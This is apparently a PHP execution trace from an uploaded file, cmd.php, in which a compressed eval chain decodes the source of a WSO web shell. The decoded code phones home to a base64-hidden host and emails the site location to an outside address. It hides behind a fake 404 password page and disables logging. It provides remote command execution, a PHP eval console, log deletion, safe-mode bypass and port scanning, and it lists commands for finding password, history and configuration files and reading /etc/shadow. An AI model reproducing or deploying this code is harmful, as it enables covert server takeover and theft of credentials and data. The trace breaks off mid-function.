3 11 0 0.002185 453152 gzuncompress 0 /var/www/html/uploads/cmd.php(4) : eval()'d code 1 1 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 1 0.002907 539200
3 11 R '<?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3 12 0 0.005625 1143752 eval 1 '?><?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n if($gitt == false){\r\n @$gitt = file_get_contents($x);\r\n }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' ©\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = 